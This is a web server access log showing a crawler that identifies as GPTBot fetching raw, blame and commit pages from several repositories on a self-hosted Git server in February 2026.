"/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor.spec" [Client 74.7.227.38] [Length 725] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor.spec" +[17/Feb/2026:13:47:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor.spec" [Client 74.7.227.38] [Length 725] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor.spec" +[17/Feb/2026:13:47:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9972] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" +[17/Feb/2026:13:47:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_KRX.py?display=source" [Client 74.7.227.38] [Length 17543] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_KRX.py" +[17/Feb/2026:13:47:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 287] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" +[17/Feb/2026:13:47:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 153441] [Gzip 15.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:13:47:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor.spec" [Client 74.7.227.38] [Length 12262] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor.spec" +[17/Feb/2026:13:47:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 880569] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/base_library.zip" +[17/Feb/2026:13:47:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 10194] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/base_library.zip" +[17/Feb/2026:13:47:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 2009125] [Gzip 22.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/base_library.zip" +[17/Feb/2026:13:47:40 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" +[17/Feb/2026:13:47:41 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor" +[17/Feb/2026:13:47:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/package.json" [Client 74.7.227.38] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/package.json" +[17/Feb/2026:13:47:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/status.json" +[17/Feb/2026:13:47:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/Dockerfile" [Client 74.7.227.38] [Length 9912] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/Dockerfile" +[17/Feb/2026:13:47:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 14689] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components" +[17/Feb/2026:13:47:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/BatchControl.png" [Client 74.7.227.38] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" +[17/Feb/2026:13:47:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor.spec" [Client 74.7.227.38] [Length 11445] [Gzip 5.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor.spec" +[17/Feb/2026:13:47:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor.spec" [Client 74.7.227.38] [Length 9861] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor.spec" +[17/Feb/2026:13:47:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor.spec" [Client 74.7.227.38] [Length 725] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor.spec" +[17/Feb/2026:13:47:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/BatchControl.png" [Client 74.7.227.38] [Length 10844] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images" +[17/Feb/2026:13:47:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.html" [Client 74.7.227.38] [Length 23742] [Gzip 11.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/index.html" +[17/Feb/2026:13:47:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14202] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components" +[17/Feb/2026:13:47:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13654] [Gzip 5.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Hero.tsx" +[17/Feb/2026:13:47:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16475] [Gzip 5.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components" +[17/Feb/2026:13:47:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 14814] [Gzip 4.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components" +[17/Feb/2026:13:47:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Services.tsx" +[17/Feb/2026:13:47:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 14591] [Gzip 6.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Services.tsx" +[17/Feb/2026:13:47:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15548] [Gzip 4.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components" +[17/Feb/2026:13:47:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 13932] [Gzip 4.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components" +[17/Feb/2026:13:47:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/Dockerfile" [Client 74.7.227.38] [Length 9880] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/Dockerfile" +[17/Feb/2026:13:47:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/BatchControl.png" [Client 74.7.227.38] [Length 4275100] [Gzip 11.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/BatchControl.png" +[17/Feb/2026:13:47:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/BatchControl.png" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/BatchControl.png" +[17/Feb/2026:13:47:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Footer.tsx" +[17/Feb/2026:13:47:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages/DCS.html" [Client 74.7.227.38] [Length 22723] [Gzip 7.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages" +[17/Feb/2026:13:47:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Contact.tsx" +[17/Feb/2026:13:47:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Header.tsx" +[17/Feb/2026:13:47:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb" [Client 74.7.227.38] [Length 14350] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb" +[17/Feb/2026:13:48:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/find/commit/18fa480c84b358da8bf50d54057f53591759225f" [Client 74.7.227.38] [Length 7506] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f" +[17/Feb/2026:13:48:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:13:48:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/About.tsx" +[17/Feb/2026:13:48:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 13784] [Gzip 6.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/About.tsx" +[17/Feb/2026:13:48:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/wiki" [Client 74.7.227.38] [Length 7372] [Gzip 2.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/forks" +[17/Feb/2026:13:48:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument" [Client 74.7.227.38] [Length 10418] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument" +[17/Feb/2026:13:48:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor" [Client 74.7.227.38] [Length 12389] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/watchdog.py" +[17/Feb/2026:13:48:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages/DCS.html" [Client 74.7.227.38] [Length 25663] [Gzip 12.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages/DCS.html" +[17/Feb/2026:13:48:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages/DCS.html" [Client 74.7.227.38] [Length 21975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages/DCS.html" +[17/Feb/2026:13:48:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages/DCS.html" [Client 74.7.227.38] [Length 9890] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages/DCS.html" +[17/Feb/2026:13:48:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/find/commit/bf87175f515287fd25d175843915ffa6178025eb" [Client 74.7.227.38] [Length 7500] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb" +[17/Feb/2026:13:48:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/DOCKER_GUIDE.md" [Client 74.7.227.38] [Length 15937] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker" +[17/Feb/2026:13:48:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/DOCKER_GUIDE.md" [Client 74.7.227.38] [Length 15904] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker" +[17/Feb/2026:13:48:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 14852] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components" +[17/Feb/2026:13:48:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 13970] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 